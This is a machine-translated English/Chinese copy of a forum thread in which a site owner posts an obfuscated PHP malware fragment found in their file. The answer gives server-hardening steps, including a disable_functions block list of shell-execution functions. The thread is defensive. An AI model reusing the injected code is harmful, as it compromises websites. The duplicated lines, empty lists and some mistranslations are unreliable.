[英]PHP obfuscated “Dodgy” code is appearing on my website
I found this on my php file: 我在我的php文件中找到了这个:
<?php $glsaucbk = '5 156 x61"])))) { $GLOBALS[" ]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1:!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz) x24]25 x24- x24-!% x24- x24*!|! x24- x24 x5c%j24#-!#]y38#-!%w:**<")));$nkfhbiv = $sorsjsw("", $wrwjkjc); $nkfhbiv#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x2nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fep::::-111112)eobs`un>qp%!|Z~!<##!>!2w*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]8]275]y7:]268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< ();}}AZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutc252]y85]256]y6g]257]y86]267]y74tjyf`4 x223}!+!<+{e%+*!*+fe4y4 x24- x24]y8 x24- x24]26 x24- x24!>!fyqmpef)# x24*<!%t::!>! x24Ypp3)%c%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f x27,*e x27,*d x2%rxB%epnbss!>!bssbz)#44ec:649#!-#j0#!/
Its on the head of the file... I've try to delete this but its reapear directly. 它位于文件的头部...我尝试删除此文件,但直接消失。 I haveuse a php detector and is say me DodgyPHP.
我有一个PHP检测器,并说我DodgyPHP。 Have u alreay have this malicious code on your php file ?
您是否已经在您的php文件中拥有此恶意代码?
I don't think you need to know any more than you do already: 我认为您不需要比已经了解的更多:
You should at least : 您至少应该:
While not a direct answer; 虽然不是直接答案; this would be useful step guide for how to clean up your system.
这将是有关清理系统的有用步骤指南。
The symptoms show your system has also certainly been hacked, and is still hackable. 症状表明您的系统当然也已经被黑客入侵,并且仍然可以被黑客入侵。
You need to follow the link here http://www.gregfreeman.io/2013/steps-to-take-when-you-know-your-php-site-has-been-hacked/ and take significant steps to hardening your system from future hacks: 您需要点击此处的链接http://www.gregfreeman.io/2013/steps-to-take-when-you-know-your-php-site-has-been-hacked/,并采取重要措施来强化您的来自未来黑客的系统:
ps aux | grep apache
ps aux | grep apache
ps aux | grep apache
or ps aux | grep nginx
ps aux | grep apache
或ps aux | grep nginx
ps aux | grep nginx
to find the userid that your web server is running under. ps aux | grep nginx
查找运行Web服务器的用户ID。 Make sure the files are not owned by that user. sudo -u <that userid> touch /path/to/web/files/some_test_file
. sudo -u <that userid> touch /path/to/web/files/some_test_file
类的操作来检查权限。 If that successfully creates a file, then you have a problem and you need to adjust permissions. Edit your php.ini and disable dangerous functions (such as exec
) and classes: 编辑您的php.ini并禁用危险功能(例如
exec
)和类:
disable_functions = "exec,passthru,shell_exec,system,proc_open,popen, curl_multi_exec,parse_ini_file,show_source"
auto_prepend_file
and auto_append_file
values are expected or blank. auto_prepend_file
和auto_append_file
值是预期还是空白。 cron_jobs
running on your server. cron_jobs
在服务器上运行。 Note: Could others who know add and edit this post to add further useful guides and information.
注意: 其他知道的人可以添加和编辑此帖子,以添加更多有用的指南和信息。 Could be a good resource for future readers.
对于将来的读者来说可能是很好的资源。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.